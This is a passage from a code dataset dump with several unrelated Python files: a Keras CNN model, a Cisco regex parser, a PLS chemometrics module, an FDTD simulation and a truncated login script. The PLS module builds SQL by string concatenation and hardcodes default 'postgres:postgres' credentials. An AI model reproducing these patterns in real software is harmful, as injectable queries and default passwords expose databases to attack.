attention_probabilities = Permute((2, 1))(x)\n\n x = multiply([attention_input, attention_probabilities], name='attention_mul')\n x = Lambda(lambda x: K.sum(x, axis=1))(x)\n\n sentence_attention = Model(attention_input, x, name='sentence_attention')\n\n embedding_layer = Embedding(\n embeddings.shape[0],\n embeddings.shape[1],\n input_length=config['sentence_length'],\n trainable=False,\n weights=[embeddings],\n )\n\n input = Input(shape=(config['sentence_length'],), dtype='int32')\n x = embedding_layer(input)\n x = SpatialDropout1D(config['dropout_embedding'])(x)\n\n x = Conv1D(\n config['cnn_num_filters'],\n 3,\n # activation='relu',\n use_bias=True,\n # kernel_regularizer=regularizers.l2(config['l2_reg_lambda']),\n # strides=1\n )(x)\n\n\n # x = MaxPooling1D(1, padding='valid')(x)\n # x = Flatten()(x)\n #x = Attention()(x)\n\n #x = Bidirectional(GRU(config['lstm_layer_size'], return_sequences=config['attention'], recurrent_dropout=config['recurrent_dropout'], dropout=config['dropout_prob']))(x)\n # x = GRU(config['lstm_layer_size'], return_sequences=config['attention'], recurrent_dropout=config['recurrent_dropout'], dropout=config['dropout_prob'])(x)\n\n if config['attention']:\n #x = sentence_attention(x)\n x = Attention()(x)\n\n # x = ActivityRegularization(l2=config['l2_reg_lambda'])(x)\n\n #\n # conv_results[-1] = ActivityRegularization(l2=config['l2_reg_lambda'])(conv_results[-1])\n\n if config['dense_layer_size']:\n x = Dense(config['dense_layer_size'], activation='relu',\n kernel_regularizer=regularizers.l2(config['l2_reg_lambda']))(x)\n x = Dropout(config['dropout_prob'])(x)\n\n output = Dense(1, activation='sigmoid')(x)\n\n model = Model(inputs=input, outputs=output)\n\n return model, config\n\n\n","sub_path":"model_cnn_rnn.py","file_name":"model_cnn_rnn.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"46922315","text":"#!/usr/bin/env python\nfrom __future__ import unicode_literals, print_function\nimport re\n\n\nshow_version = '''\nCisco 881 (MPC8300) processor (revision 1.0) with 236544K/25600K bytes of memory.\nProcessor board ID FTX0000038X\n5 FastEthernet interfaces\n1 Virtual Private Network (VPN) Module\n256K bytes of non-volatile configuration memory.\n126000K bytes of ATA CompactFlash (Read/Write)\n'''\n\nkhade = re.search(r\"^Cisco (?P\\S+) .* with (?P\\S+) \" , show_version, flags=re.M)\nmodel = khade.groupdict()['model']\nmemory = khade.groupdict()['memory']\n\nprint(model)\nprint(memory)","sub_path":"automationrepo/regexp.py","file_name":"regexp.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"627974330","text":"import sys\nimport numpy as np \n# import matplotlib.pyplot as plt\nimport json\nfrom math import sqrt\nfrom flask import jsonify\nfrom datetime import datetime\nfrom scipy import stats\nfrom pyod.models.knn import KNN\n# from sksos import SOS\nfrom metodos.pca import PCA\n\nsys.path.append(\"..\\dao\")\n\nfrom sklearn.cross_decomposition import PLSRegression\nfrom sklearn.metrics import r2_score, mean_squared_error, median_absolute_error, mean_absolute_error, \\\n mean_squared_log_error, coverage_error, label_ranking_loss, explained_variance_score, \\\n label_ranking_average_precision_score\nfrom sqlalchemy.orm import relationship, backref, sessionmaker, joinedload\nfrom sklearn import metrics\n\nfrom sqlalchemy import create_engine\n\ndb_string = 
\"postgresql://postgres:postgres@localhost:5432/Quimiometria\"\n# db_string = \"postgresql://postgres:postgres@localhost:5432/bkpSteven\"\n\ndb = create_engine(db_string)\n\nSession = sessionmaker(bind=db)\nsession = Session()\n\n\nclass PLS(object):\n\n def predicao(self, idmodelo, idamostra):\n\n idmodelo = idmodelo\n\n idamostra = idamostra\n\n print(idmodelo)\n print(idamostra)\n\n X = self.selectMatrizX(idmodelo, \"VALIDACAO\")\n Y = self.selectMatrizY(idmodelo, \"VALOR\", \"VALIDACAO\")\n\n amostraPredicao = self.selectAmostra(idamostra, idmodelo)\n\n valorReferencia = self.selectDadosReferenciaAmostra(idamostra, idmodelo)\n\n pls = PLSRegression(copy=True, max_iter=500, n_components=20, scale=False, tol=1e-06)\n\n pls.fit(X, Y)\n print(amostraPredicao)\n valorPredito = pls.predict(amostraPredicao)\n\n print('Amostra: ' + str(idamostra) + ' - Valor Predito :' + str(valorPredito) + ' - Valor Referencia :' + str(\n valorReferencia))\n\n cursorDadosCalibracao = db.execute(\"select rmsec, rmsep, coeficientecal, coeficienteval, dtcalibracao \"\n \"from calibracao where inativo = 'A' and idmodelo = \" + str(idmodelo) + \" \")\n for regCodigo in cursorDadosCalibracao:\n rmsec = regCodigo[0]\n rmsep = regCodigo[1]\n coeficienteCal = regCodigo[2]\n coeficienteVal = regCodigo[3]\n dtcalibracao = regCodigo[4]\n\n print(rmsec)\n print(rmsep)\n print(coeficienteCal)\n print(coeficienteVal)\n print(dtcalibracao)\n\n dtcalibracao = dtcalibracao.strftime('%d/%m/%Y')\n print(dtcalibracao)\n\n # tratamento dos dados para o Json\n coeficienteCal = round(coeficienteCal, 2)\n coeficienteVal = round(coeficienteVal, 2)\n rmsec = round(rmsec, 2)\n rmsep = round(rmsep, 2)\n valorReferencia = round(valorReferencia, 2)\n\n valorPreditoString = str(valorPredito)\n valorPreditoString = valorPreditoString.replace(\"[\", \"\")\n valorPreditoString = valorPreditoString.replace(\"]\", \"\")\n\n ##Contrucao do JSON\n json_data = jsonify(idamostra=str(idamostra), valorpredito=str(valorPreditoString),\n rmsec=str(rmsec), rmsep=str(rmsep), idmodelo=str(idmodelo), dtcalibracao=str(dtcalibracao),\n valorreferencia=str(valorReferencia), coeficientecal=str(coeficienteCal), coeficienteval=str(coeficienteVal))\n\n return json_data\n\n def selectAmostra(self, idAmostra, idmodelo):\n\n try:\n # numero de colunas da matriz\n cursorColunas = db.execute(\"select max(x.nrposicaocoluna) from matrizx x where x.idamostra = \" + str(\n idAmostra) + \" and x.idmodelo = \" + str(idmodelo) + \"\")\n\n contadorColunas = 0\n\n for linha in cursorColunas:\n contadorColunas = linha[0]\n\n # Preenchimento da MatrizX\n matrizX = []\n\n cursorAmostras = db.execute(\"select x.idamostra from matrizx x \"\n \"where x.idamostra = \" + str(idAmostra) + \"\"\n \" and x.idmodelo = \" + str(idmodelo) + \"\"\n \" group by x.idamostra order by x.idamostra asc\")\n\n listaAmostras = []\n for regAmostras in cursorAmostras:\n listaAmostras.append(regAmostras[0])\n\n # print(listaAmostras)\n\n for amostra in listaAmostras:\n # print(amostra)\n linhaMatriz = []\n\n cursorDadosAmostra = db.execute(\"SELECT x.idamostra, x.vllinhacoluna FROM matrizx x \"\n \"where x.idamostra = \" + str(amostra) + \"\"\n \" and x.idmodelo = \" + str(\n idmodelo) + \"\"\n \" order by x.idamostra, x.nrsequencia, x.nrposicaolinha, x.nrposicaocoluna asc\")\n\n for regDadosAmostra in cursorDadosAmostra:\n if regDadosAmostra[1] == 0E-8:\n linhaMatriz.append('0')\n else:\n linhaMatriz.append(regDadosAmostra[1])\n # x=Symbol('x')\n # difx = diff(regDadosAmostra[1], x)\n # 
linhaMatriz.append(difx)\n\n # print(amostra)\n # print(linhaMatriz)\n matrizX += [linhaMatriz]\n\n # print('AMOSTRA SELECIONADA')\n # print(matrizX)\n\n return matrizX\n except Exception:\n # print(Exception)\n return \"Ocorreu um erro na busca dos dados\"\n\n def selectMatrizX(self, idModelo, conjunto):\n\n try:\n # numero de colunas da matriz\n\n if conjunto == \"TODOS\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \" inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \")\n whereConsulta = (\"where x.idModelo = \" + str(idModelo) + \" and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"CALIBRAR\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"inner join amostra_calibracao ac on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \"inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\"where x.idModelo = \" + str(\n idModelo) + \" and ac.tpconjunto = 'NORMAL' and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"CALIBRACAO\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"inner join amostra_calibracao ac on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \"inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\"where x.idModelo = \" + str(\n idModelo) + \" and ac.tpconjunto = 'CALIBRACAO' and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"VALIDACAO\":\n sqlConsulta = (\" inner join matrizy y on (x.idamostra = y.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"inner join amostra_calibracao ac on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \"inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\n \"where x.idModelo = \" + str(idModelo) + \" and ac.tpconjunto = 'VALIDACAO' and a.tpamostra <> 'OUTLIER' \")\n\n sqlColunas = (\n \" select max(x.nrposicaocoluna) from matrizx x \" + str(sqlConsulta) + \" \" + str(whereConsulta) + \" \")\n cursorColunas = db.execute(sqlColunas)\n\n contadorColunas = 0\n\n for linha in cursorColunas:\n contadorColunas = linha[0]\n # print(contadorColunas)\n\n # Preenchimento da MatrizX\n matrizX = []\n\n sqlListaAmostras = (\"select x.idamostra from matrizx x \" + str(sqlConsulta) + str(\n whereConsulta) + \"group by x.idamostra order by x.idamostra asc\")\n cursorAmostras = db.execute(sqlListaAmostras)\n\n \"\"\"cursorAmostras = db.execute(\"select x.idamostra from matrizx x \"\n \"inner join matrizy y on (y.idamostra = x.idamostra and y.idmodelo = x.idmodelo) \"\n \"inner join amostra a on ( a.idamostra = x.idamostra and a.idmodelo = x.idmodelo ) \"\n \"where x.idModelo = \" + str(idModelo) + \" \" \n \"group by x.idamostra order by x.idamostra asc\")\"\"\"\n\n cont = 0\n listaAmostras = []\n for regAmostras in cursorAmostras:\n listaAmostras.append(regAmostras[0])\n cont = cont + 1\n\n # print('...............................')\n # print('Qtde de Amostras - Matriz X')\n # print(conjunto)\n # print(cont)\n # print('...............................')\n\n for amostra in 
listaAmostras:\n # print(amostra)\n linhaMatriz = []\n\n cursorDadosAmostra = db.execute(\"SELECT idamostra, vllinhacoluna \tFROM matrizx x \"\n \"where x.idamostra = \" + str(amostra) + \" and x.idModelo = \" + str(\n idModelo) + \"\"\n \"order by x.idamostra, x.nrsequencia, x.nrposicaolinha, x.nrposicaocoluna asc\")\n\n for regDadosAmostra in cursorDadosAmostra:\n if regDadosAmostra[1] == 0E-8:\n linhaMatriz.append('0')\n else:\n linhaMatriz.append(regDadosAmostra[1])\n # x=Symbol('x')\n # difx = diff(regDadosAmostra[1], x)\n # linhaMatriz.append(difx)\n\n # print(amostra)\n # print(linhaMatriz)\n matrizX += [linhaMatriz]\n\n # print('MATRIZ - X')\n # print(matrizX)\n\n return matrizX\n except Exception:\n print(Exception)\n return \"Ocorreu um erro na busca dos dados\"\n\n def selectMatrizY(self, idmodelo, tipo, conjunto):\n\n try:\n if conjunto == \"TODOS\":\n sqlConsulta = (\" select y.idamostra from matrizy y \"\n \"inner join amostra a on (a.idamostra = y.idamostra and a.idmodelo = y.idmodelo) \")\n whereConsulta = (\" where y.idmodelo = \" + str(idmodelo) + \" and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"CALIBRACAO\":\n sqlConsulta = (\" select ac.idamostra from amostra_calibracao ac \"\n \" inner join amostra a on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \" inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\" where ac.idModelo = \" + str(\n idmodelo) + \" and ac.tpconjunto = 'CALIBRACAO' and a.tpamostra <> 'OUTLIER' \")\n\n elif conjunto == \"VALIDACAO\":\n sqlConsulta = (\" select ac.idamostra from amostra_calibracao ac \"\n \" inner join amostra a on ( a.idamostra = ac.idamostra and a.idmodelo = ac.idmodelo ) \"\n \" inner join calibracao c on ( c.idcalibracao = ac.idcalibracao and c.inativo = 'A' ) \")\n whereConsulta = (\" where ac.idModelo = \" + str(\n idmodelo) + \" and ac.tpconjunto = 'VALIDACAO' and a.tpamostra <> 'OUTLIER' \")\n\n matrizY = []\n\n sqlListaAmostras = (\" \" + str(sqlConsulta) + \" \" + str(whereConsulta) + \" order by 1 asc\")\n cursorAmostras = db.execute(sqlListaAmostras)\n\n \"\"\"cursorAmostras = db.execute(\"select y.idamostra from matrizy y \"\n \"inner join amostra a on (a.idamostra = y.idamostra and a.idmodelo = y.idmodelo) \"\n \" where y.idmodelo = \" + str(idmodelo) + \" \" \n \"order by y.idamostra asc\")\"\"\"\n\n listaAmostras = []\n cont = 0\n for regAmostras in cursorAmostras:\n listaAmostras.append(regAmostras[0])\n cont = cont + 1\n\n # print(listaAmostras)\n # print('............................................')\n # print('Qtde de Amostras - Matriz Y')\n # print(conjunto)\n # print(cont)\n # print('............................................')\n\n for amostra in listaAmostras:\n # print(amostra)\n linhaMatriz = []\n\n cursorDadosAmostra = db.execute(\"select y.idamostra, case y.vlreferencia when 0 then '0.1' else y.vlreferencia end as vlreferencia \"\n \"from matrizy y where y.idamostra = \" + str(amostra) + \" \"\n \"and y.idmodelo = \" + str(idmodelo) + \" order by y.idamostra asc\")\n\n for regDadosAmostra in cursorDadosAmostra:\n if regDadosAmostra[1] == 0E-8:\n linhaMatriz.append('0')\n else:\n if tipo == \"ID\":\n linhaMatriz.append(regDadosAmostra[0])\n if tipo == \"VALOR\":\n linhaMatriz.append(np.double(regDadosAmostra[1]))\n\n # print(amostra)\n # print(linhaMatriz)\n matrizY += [linhaMatriz]\n\n # print('MATRIZ - Y')\n # print(matrizY)\n\n return matrizY\n except Exception:\n print(Exception)\n return \"Ocorreu um erro na busca dos 
dados\"\n\n def selectDadosReferenciaAmostra(self, idAmostra, idmodelo):\n\n try:\n cursorDadosAmostra = db.execute(\n \"SELECT y.vlreferencia FROM matrizy y where y.idamostra = \" + str(idAmostra) + \" and y.idmodelo = \" + str(\n idmodelo) + \"\")\n\n for regDadosAmostra in cursorDadosAmostra:\n valorReferencia = regDadosAmostra[0]\n\n return valorReferencia\n except Exception:\n return \"Ocorreu um erro na busca dos dados\"\n\n def detectarOutlierKNN(self, idmodelo, Xtodos, corteOutlier):\n # Detecao Outliers 1--------------------------------------------------------------\n clf = KNN()\n clf.fit(Xtodos)\n\n # get outlier scores\n y_train_scores = clf.decision_scores_ # raw outlier scores\n y_test_scores = clf.decision_function(Xtodos) # outlier scores\n\n YCodigoTodosComOutilier = self.selectMatrizY(idmodelo, \"ID\", \"TODOS\")\n\n cont = 0\n amostrasRemovidas = 0\n\n for itemOutilier in y_train_scores:\n if itemOutilier > corteOutlier:\n contTodos = 0\n for item in YCodigoTodosComOutilier:\n amostra = str(item)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n if contTodos == cont:\n db.execute(\n \" update amostra set tpamostra = 'OUTLIER' where idamostra = \" + str(amostra) + \" and idmodelo = \" + str(\n idmodelo) + \"\")\n print(itemOutilier)\n amostrasRemovidas = amostrasRemovidas + 1\n break\n contTodos = contTodos + 1\n cont = cont + 1\n\n session.commit()\n print(\"Numero de Amostras Removidas: \" + str(amostrasRemovidas))\n return cont\n\n def outliersZScore(self, idmodelo, Xtodos, corteOutlier):\n y_train_scores = np.abs(stats.zscore(Xtodos))\n\n YCodigoTodosComOutilier = self.selectMatrizY(idmodelo, \"ID\", \"TODOS\")\n\n cont = 0\n amostrasRemovidas = 0\n\n for itemOutilier in y_train_scores:\n print(itemOutilier)\n if itemOutilier > corteOutlier:\n contTodos = 0\n for item in YCodigoTodosComOutilier:\n amostra = str(item)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n if contTodos == cont:\n db.execute(\n \" update amostra set tpamostra = 'OUTLIER' where idamostra = \" + str(amostra) + \" and idmodelo = \" + str(\n idmodelo) + \"\")\n print(itemOutilier)\n amostrasRemovidas = amostrasRemovidas + 1\n break\n contTodos = contTodos + 1\n cont = cont + 1\n\n session.commit()\n print(\"Numero de Amostras Removidas: \" + str(amostrasRemovidas))\n return cont\n\n def calibracao(self, idmodelo, nrcomponentes, corteOutlier, qtdeRemocoes, executaPCA, qtdePC):\n\n # Inativa calibracoes anteriores\n db.execute(\" update calibracao set inativo = 'F'\" +\n \" where idmodelo = \" + str(idmodelo) + \" \")\n db.execute(\" update amostra set tpamostra = 'NORMAL' where idmodelo = \" + str(idmodelo) + \"\")\n session.commit()\n\n # cria calibracao para o modelo\n data_Atual = datetime.today()\n data_em_texto = data_Atual.strftime('%d/%m/%Y')\n\n cursorCodigo = db.execute(\n \"select coalesce(max(idcalibracao),0) + 1 as codigo from calibracao where idmodelo = \" + str(idmodelo) + \" \")\n for regCodigo in cursorCodigo:\n idcalibracao = regCodigo[0]\n\n db.execute(\"insert into calibracao (idcalibracao, idmodelo, dtcalibracao, inativo) \"\n \"values (\" + str(idcalibracao) + \",\" + str(idmodelo) + \" , '\" + str(data_em_texto) + \"', 'A' )\")\n session.commit()\n\n idmodelo = idmodelo\n\n print(idmodelo)\n\n Xtodos = self.selectMatrizX(idmodelo, \"TODOS\")\n\n # caso seja necessario PCA\n pca = PCA()\n if executaPCA == 'S':\n Xtodos = pca.testePCA(Xtodos,qtdePC)\n\n\n # 
***************************************************************************************************************\n # inicio kennard-stone\n # data = pd.DataFrame(Xtodos)\n\n #Xtodos = self.selectMatrizX(idmodelo, \"TODOS\")\n number_of_samples = Xtodos.__len__()\n number_of_samples = number_of_samples * 0.65\n\n # selected_sample_numbers, remaining_sample_numbers = kennardstonealgorithm(X, number_of_samples)\n amostras_Calibracao = kennardStone(Xtodos, number_of_samples)\n\n # amostras_Calibracao = kennardStone(autoscaled_X, number_of_samples)\n # print(\"amostras_Calibracao\")\n # print(amostras_Calibracao)\n # print(\"---\")\n # print(\"remaining sample numbers\")\n # print(remaining_sample_numbers)\n\n # Insercao das amostras de Validacao\n YCodigoTodos = self.selectMatrizY(idmodelo, \"ID\", \"TODOS\")\n\n for amostraX in YCodigoTodos:\n\n amostra = str(amostraX)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n\n # print(amostra)\n db.execute(\"insert into amostra_calibracao (idcalibracao, idmodelo, idamostra, tpconjunto) \"\n \"values (\" + str(idcalibracao) + \",\" + str(idmodelo) + \" , '\" + str(\n int(float(amostra))) + \"','VALIDACAO' )\")\n\n session.commit()\n\n # Insercao das amostras de Calibracao\n cont = 0\n for amostraCalibracao in amostras_Calibracao:\n amostra = str(amostraCalibracao)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n db.execute(\"update amostra_calibracao set tpconjunto = 'CALIBRACAO' \"\n \" where idcalibracao =\" + str(idcalibracao) + \" and idmodelo = \" + str(idmodelo) +\n \" and idamostra = \" + str(int(float(amostra))))\n session.commit()\n\n # print(cont)\n cont = cont + 1\n session.commit()\n\n Xcal = self.selectMatrizX(idmodelo, \"CALIBRACAO\")\n Xval = self.selectMatrizX(idmodelo, \"VALIDACAO\")\n\n if executaPCA == 'S':\n Xcal = pca.testePCA(Xcal,qtdePC)\n Xval = pca.testePCA(Xval, qtdePC)\n\n qtde = 0\n if corteOutlier > 0:\n while qtde < qtdeRemocoes:\n self.detectarOutlierKNN(idmodelo, Xval, corteOutlier)\n self.detectarOutlierKNN(idmodelo, Xcal, corteOutlier)\n\n Xval = self.selectMatrizX(idmodelo, \"VALIDACAO\")\n Xcal = self.selectMatrizX(idmodelo, \"CALIBRACAO\")\n\n if executaPCA == 'S':\n Xcal = pca.testePCA(Xcal, qtdePC)\n Xval = pca.testePCA(Xval, qtdePC)\n\n qtde = qtde + 1\n\n Ycal = self.selectMatrizY(idmodelo, \"VALOR\", \"CALIBRACAO\")\n Yval = self.selectMatrizY(idmodelo, \"VALOR\", \"VALIDACAO\")\n\n YCodigoCal = self.selectMatrizY(idmodelo, \"ID\", \"CALIBRACAO\")\n YCodigoVal = self.selectMatrizY(idmodelo, \"ID\", \"VALIDACAO\")\n\n # Dados do Conjunto de Calibracao\n plsCal = PLSRegression(copy=True, max_iter=500, n_components=nrcomponentes, scale=False, tol=1e-06)\n plsCal.fit(Xcal, Ycal)\n coeficiente = plsCal.score(Xcal, Ycal, sample_weight=None)\n print('score do modelo PLS - Calibracao')\n print(coeficiente)\n print('R2 do modelo PLS - Calibracao')\n coeficienteCal = r2_score(plsCal.predict(Xcal), Ycal)\n print(coeficienteCal)\n\n # Dados do Conjunto de Validacao\n plsVal = PLSRegression(copy=True, max_iter=500, n_components=nrcomponentes, scale=False, tol=1e-06)\n plsVal.fit(Xval, Yval)\n coeficiente = plsVal.score(Xval, Yval, sample_weight=None)\n print('score do modelo PLS - Validacao')\n print(coeficiente)\n print('R2 do modelo PLS - Validacao')\n coeficienteVal = r2_score(plsVal.predict(Xval), Yval)\n print(coeficienteVal)\n # print('label_ranking_average_precision_score ')\n # print(label_ranking_average_precision_score(np.array(Yval), 
np.array(plsVal.y_scores_)))\n\n # Ajustar Calculos do RMSEC\n matYPredCalibracao = []\n\n for itemMatrizY in YCodigoCal:\n amostra = str(itemMatrizY)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n # print(i)\n linhaMatriz = []\n amostraPredicao = self.selectAmostra(int(float(amostra)), idmodelo)\n\n if executaPCA == 'S':\n amostraPredicao = pca.testePCA(amostraPredicao, qtdePC)\n\n Y_pred = plsCal.predict(amostraPredicao)\n # print(Y_pred)\n linhaMatriz.append(round(np.double(Y_pred), 0))\n matYPredCalibracao += [linhaMatriz]\n\n rmsec = sqrt(mean_squared_error(Ycal, matYPredCalibracao))\n print('RMSEC')\n print(rmsec)\n\n # Ajustar Calculos do RMSEP\n matYPredValidacao = []\n\n for itemMatrizY in YCodigoVal:\n amostra = str(itemMatrizY)\n amostra = amostra.replace(\"[\", \"\")\n amostra = amostra.replace(\"]\", \"\")\n # print(i)\n linhaMatriz = []\n amostraPredicao = self.selectAmostra(int(float(amostra)), idmodelo)\n\n if executaPCA == 'S':\n amostraPredicao = pca.testePCA(amostraPredicao, qtdePC)\n\n Y_pred = plsVal.predict(amostraPredicao)\n # print(Y_pred)\n linhaMatriz.append(round(np.double(Y_pred), 0))\n matYPredValidacao += [linhaMatriz]\n\n rmsep = sqrt(mean_squared_error(Yval, matYPredValidacao))\n print('RMSEP')\n print(rmsep)\n\n # Atualiza valores da calibracao\n db.execute(\"update calibracao set rmsec = \" + str(rmsec) +\n \" , inativo = 'A'\" +\n \" , rmsep = \" + str(rmsep) +\n \" , coeficientecal = \" + str(coeficienteCal) +\n \" , coeficienteval = \" + str(coeficienteVal) +\n \" , dtcalibracao = '\" + str(data_em_texto) + \"'\"\n \" where idmodelo = \" + str(idmodelo) +\n \" and idcalibracao = \" + str(idcalibracao) + \" \")\n session.commit()\n\n print(\"VARIAVEIS LATENTES\")\n print(nrcomponentes)\n\n return idmodelo\n\n\ndef kennardStone(X, k, precomputed=False):\n n = len(X) # number of samples\n # print(\"Input Size:\", n, \"Desired Size:\", k)\n now = datetime.now()\n print(\"Executando KennStonne\")\n print(now)\n assert n >= 2 and n >= k and k >= 2, \"Error: number of rows must >= 2, k must >= 2 and k must > number of rows\"\n\n # pair-wise distance matrix\n dist = metrics.pairwise_distances(X, metric='euclidean', n_jobs=-1)\n\n # get the first two samples\n i0, i1 = np.unravel_index(np.argmax(dist, axis=None), dist.shape)\n selected = set([i0, i1])\n k -= 2\n # iterate find the rest\n minj = i0\n while k > 0 and len(selected) < n:\n mindist = 0.0\n for j in range(n):\n if j not in selected:\n mindistj = min([dist[j][i] for i in selected])\n if mindistj > mindist:\n minj = j\n mindist = mindistj\n # print(selected, minj, [dist[minj][i] for i in selected])\n selected.add(np.int(minj))\n k -= 1\n # print(\"selected samples indices: \", selected)\n # return selected samples\n print(\"Terminou KennStonne\")\n now = datetime.now()\n print(now)\n return selected\n # if precomputed:\n # return list(selected)\n # else:\n # return X[list(selected), :]\n\n###EXECUTAVEL REMOVER SEMPRE\n#pls = PLS()\n#pls.predicao(4,101)\n# # PARAMETROS\n# # IDMODELO, NR_COMPONENTES (VARIAVEIS LATENTES), VALOR DE CORTE OUTLIER, QTDE DE REMOCOES, FAZ PCA S ou N, qtde PC\n#pls.calibracao(4, 20, 0.4, 4, 'N', 3)\n\n\n#Valor Utilizado Para a Qualificacao\n#pls.calibracao(3, 12, 0.9, 3)\n\nclass NumpyEncoder(json.JSONEncoder):\n \"\"\" Special json encoder for numpy types \"\"\"\n\n def default(self, obj):\n if isinstance(obj, (np.int_, np.intc, np.intp, np.int8,\n np.int16, np.int32, np.int64, np.uint8,\n np.uint16, np.uint32, np.uint64)):\n return 
int(obj)\n elif isinstance(obj, (np.float_, np.float16, np.float32,\n np.float64)):\n return float(obj)\n elif isinstance(obj, (np.ndarray,)): #### This is the fix\n return obj.tolist()\n return json.JSONEncoder.default(self, obj)\n\n\n'''\n\n\nprint('Erro absoluto mediano')\nprint(median_absolute_error(Y,matYPred))\n\nprint('Erro quadrático log Médio')\nprint(mean_squared_log_error(Y,matYPred))\n\nprint('coverage_error ')\nprint(coverage_error(np.array(Y),np.array(pls.y_scores_)))\n\nprint('label_ranking_average_precision_score ')\nprint(label_ranking_average_precision_score(np.array(Y),np.array(pls.y_scores_)))\n\nprint('label_ranking_loss')\nprint(label_ranking_loss(np.array(Y),np.array(pls.y_scores_)))\n\nprint('explained_variance_score')\nprint(explained_variance_score(Y,matYPred))\n\n\n'''\n\n\n","sub_path":"api-Regressao-chemo/metodos/pls.py","file_name":"pls.py","file_ext":"py","file_size_in_byte":25517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51570687","text":"import numpy as np\r\nimport math as m\r\nimport matplotlib.pyplot as plt\r\n\r\nimp0 = 377.0\r\nsize = 1800\r\nepsilon = 5\r\n\r\nc = 1/np.sqrt(epsilon)\r\na = (c-1)/(c+1)\r\nb = 2/(c + 1)\r\n# Left boundary\r\nwl_nm1,wl_n,wl_np1 = 0,0,0 # Field at x=0 at time steps n-1, n, n+1\r\nwlp1_nm1,wlp1_n,wlp1_np1 = 0,0,0 # Field at x=1 at time steps n-1, n, n+1\r\n# Right boundary\r\nwr_nm1,wr_n,wr_np1 = 0,0,0 # Field at x=size at time steps n-1, n, n+1\r\nwrm1_nm1,wrm1_n,wrm1_np1 = 0,0,0 # Field at x=size-1 at time steps n-1, n, n+1\r\n\r\nsource_width = 45.0*np.sqrt(epsilon)\r\ndelay = 10*source_width\r\nsource_x = int(1.0*size/2.0)\r\n\r\ndef source(current_time, delay, source_width):\r\n return m.exp(-(current_time-delay)**2/(2.0 * source_width**2))\r\n\r\ntotal_steps = int(1*(size+delay)*np.sqrt(epsilon))\r\nframe_interval = int(total_steps/15.0)\r\nall_steps = np.linspace(0, size-1, size)\r\nez = np.zeros(size)\r\nhy = np.zeros(size)\r\nx = np.arange(0, size-1, 1)\r\n\r\nfor t in range(total_steps):\r\n hy[x] = hy[x] + (ez[x+1] - ez[x])/imp0\r\n wrm1_np1 = hy[-2]\r\n wr_np1 = -wrm1_nm1 + a*(wrm1_np1+wr_nm1) + b*(wr_n+wrm1_n)\r\n hy[-1] = wr_np1\r\n wr_nm1, wrm1_nm1 = wr_n, wrm1_n\r\n wr_n, wrm1_n = wr_np1, wrm1_np1\r\n ez[x+1] = ez[x+1] + (hy[x+1]-hy[x])*imp0/epsilon\r\n ez[source_x] += source(t, delay, source_width)\r\n #Evaluate Mur ABC value (eq. 
6.35 Taflove)\r\n wlp1_np1 = ez[1]\r\n wl_np1 = -wlp1_nm1 + a*(wlp1_np1+wl_nm1) + b*(wl_n+wlp1_n)\r\n ez[0] = wl_np1\r\n #Cycle field values at boundary\r\n wl_nm1, wlp1_nm1 = wl_n, wlp1_n\r\n wl_n, wlp1_n = wl_np1, wlp1_np1\r\n if t % 100 == 0:\r\n plt.plot(all_steps , ez, all_steps, hy*imp0)\r\n plt.pause(0.00001)\r\n plt.clf()\r\n","sub_path":"step2.py","file_name":"step2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651402512","text":"import sys\nimport os.path\nfrom os import path\nimport pickle\n\nmyfile = os.path.expanduser('~/login_details.pkl')\n\nif os.path.isfile(myfile) == False:\n print(\"You must login for performing this action\")\n exit(0)\n\n# url = 'http://192.168.2.1:8000/login/'\n# d1url = \"http://127.0.0.1:8000/files/download/?name=usrs.BookIndex/bytes/filename/mimetype/a.txt\"\n# durl = \"http://127.0.0.1:8000/files/download/?name=usrs.BookIndex/bytes/filename/mimetype/Graph_and_Trees.pdf\"\n\n# client = requests.session()\n# client.get(url)\n# csrftoken1 = client.cookies['csrftoken']\n\n# with open(myfile, 'r') as fr:\n# count = 1\n# for line in fr:\n# if count == 1:\n# u = line[:-1]\n# elif count == 